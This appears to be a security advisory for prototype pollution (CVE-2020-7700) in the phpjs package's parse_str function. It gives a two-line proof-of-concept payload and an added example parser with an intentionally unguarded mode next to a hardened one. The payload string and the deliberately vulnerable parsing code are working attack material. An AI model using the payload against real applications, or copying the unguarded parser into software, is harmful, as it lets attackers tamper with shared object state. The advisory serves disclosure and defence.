Prototype Pollution Affecting phpjs package, versions *
Threat Intelligence
Exploit Maturity: Proof of concept
EPSS: 0.66% (81st percentile)
- Snyk ID SNYK-JS-PHPJS-598681
- published 14 Aug 2020
- disclosed 14 Aug 2020
- credit Beomjin Lee
Introduced: 14 Aug 2020
CVE-2020-7700
How to fix?
There is no fixed version for phpjs.
Overview
phpjs is a community-built PHP binding in JavaScript.
Affected versions of this package are vulnerable to Prototype Pollution via parse_str.
POC:
require('phpjs').parse_str("__proto__[polluted]=true",{});
console.log(polluted) //true
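With no fixed version available, the guard has to live in the calling code. The following is an added example, not phpjs code and not part of the original advisory: a simplified bracket-key query parser (parseQuery, keyPath, FORBIDDEN and demo are hypothetical names) that shows the unguarded key walk reaching Object.prototype beside a hardened mode that drops pairs with __proto__, constructor or prototype segments and builds null-prototype objects.

```javascript
// Added example: simplified bracket-key query parser (constructed, not phpjs code).
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);

// Split "a[b][c]" into ["a", "b", "c"].
function keyPath(rawKey) {
  const head = rawKey.split('[')[0];
  const rest = [...rawKey.matchAll(/\[([^\]]*)\]/g)].map((m) => m[1]);
  return [head, ...rest];
}

// safe=false walks whatever the key names; safe=true is the hardened mode.
function parseQuery(str, { safe }) {
  const fresh = () => (safe ? Object.create(null) : {});
  const out = fresh();
  for (const pair of str.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const rawKey = decodeURIComponent(eq < 0 ? pair : pair.slice(0, eq));
    const value = eq < 0 ? '' : decodeURIComponent(pair.slice(eq + 1));
    const path = keyPath(rawKey);
    // Hardened mode: drop any pair whose path could reach a prototype.
    if (safe && path.some((seg) => FORBIDDEN.has(seg))) continue;
    let node = out;
    for (const seg of path.slice(0, -1)) {
      // Unguarded mode: node['__proto__'] is Object.prototype, so the walk
      // steps out of the result object and the final write lands there.
      if (typeof node[seg] !== 'object' || node[seg] === null) node[seg] = fresh();
      node = node[seg];
    }
    node[path[path.length - 1]] = value;
  }
  return out;
}

// Runs both modes on the advisory's input shape and reports what leaked.
function demo() {
  const input = 'a[b]=1&__proto__[demoFlag]=true'; // constructed sample input
  const safeResult = parseQuery(input, { safe: true });
  const leakedSafe = 'demoFlag' in {};
  parseQuery(input, { safe: false });
  const leakedUnsafe = 'demoFlag' in {};
  delete Object.prototype.demoFlag; // undo the pollution from the unguarded run
  return { leakedSafe, leakedUnsafe, kept: safeResult.a.b };
}

console.log(demo());
```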
CVSS Scores
version 3.1